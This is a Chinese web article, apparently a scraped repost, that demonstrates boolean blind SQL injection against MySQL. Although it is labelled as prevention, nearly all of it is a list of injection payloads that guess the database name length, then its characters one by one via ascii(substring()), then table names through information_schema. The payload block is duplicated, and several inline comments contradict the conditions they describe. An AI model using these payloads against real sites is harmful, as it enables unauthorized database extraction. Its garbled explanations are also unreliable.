日期:2011-02-28 19:48:00 来源:本站整理
<b>mysql不支持union select的盲注办法</b>[MySQL防范]
本文“<b>mysql不支持union select的盲注办法</b>[MySQL防范]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
猜解数据库长度 and Length((database()))<10 //小于12返回正常阐明数据库是12位以下 and length((database()))<8 //小于8返回错误阐明数据库名是9位的
猜解数据库长度
and Length((database()))<10 //小于12返回正常阐明数据库是12位以下
and length((database()))<8 //小于8返回错误阐明数据库名是9位的
猜解数据库名
and ascii(substring((database()),1,1))=100 //100的ascii码=d,阐明不是d
and ascii(substring((database()),1,1))=122 //122存在阐明数据库名第一位是z
and ascii(substring((database()),2,1))=114 返回错误阐明不是ascii码114=r 阐明第二位不是r
and ascii(substring((database()),2,1))=115 返回正常阐明第二位是s
.....
猜表
and Length((SELECT distinct table_name FROM information_schema.tables Where table_schema=0x7A73323236315F6462 limit 0,1))<10 #小于8返回正常表示表小于10
and Length((SELECT distinct table_name FROM information_schema.tables Where table_schema=0x7A73323236315F6462 limit 0,1))>9 #大于9返回错误,表示值是9或8... 以上是“<b>mysql不支持union select的盲注办法</b>[MySQL防范]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
<b>hosts是什么 hosts文件在什么位置 若何改正hosts</b>
<b>在 Windows 8 中手动安装语言包</b>
<b>五个常见 PHP数据库问题</b>
Windows中Alt键的12个高效快速的利用本领介绍
<b>MySQL ORDER BY 的实现解析</b>
<b>详解MySQL存储历程参数有三种范例(in、out、inout)</b>
<b>Win8系统恢复出来经典的开始菜单的办法</b>
<b>Win8系统花屏怎么办 Win8系统花屏的办理办法</b>
<b>Windows 7系统下无线网卡安装</b>
<b>为什么 Linux不需求碎片整理</b>
<b>Windows 8中删除账户的几种办法(图)</b>
<b>教你如安在win7下配置路由器</b>
and Length((database()))<10 //小于12返回正常阐明数据库是12位以下
and length((database()))<8 //小于8返回错误阐明数据库名是9位的
猜解数据库名
and ascii(substring((database()),1,1))=100 //100的ascii码=d,阐明不是d
and ascii(substring((database()),1,1))=122 //122存在阐明数据库名第一位是z
and ascii(substring((database()),2,1))=114 返回错误阐明不是ascii码114=r 阐明第二位不是r
and ascii(substring((database()),2,1))=115 返回正常阐明第二位是s
.....
猜表
and Length((SELECT distinct table_name FROM information_schema.tables Where table_schema=0x7A73323236315F6462 limit 0,1))<10 #小于8返回正常表示表小于10
and Length((SELECT distinct table_name FROM information_schema.tables Where table_schema=0x7A73323236315F6462 limit 0,1))>9 #大于9返回错误,表示值是9或8... 以上是“<b>mysql不支持union select的盲注办法</b>[MySQL防范]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
本文地址: | 与您的QQ/BBS好友分享! |
评论内容只代表网友观点,与本站立场无关!
评论摘要(共 0 条,得分 0 分,平均 0 分)
查看完整评论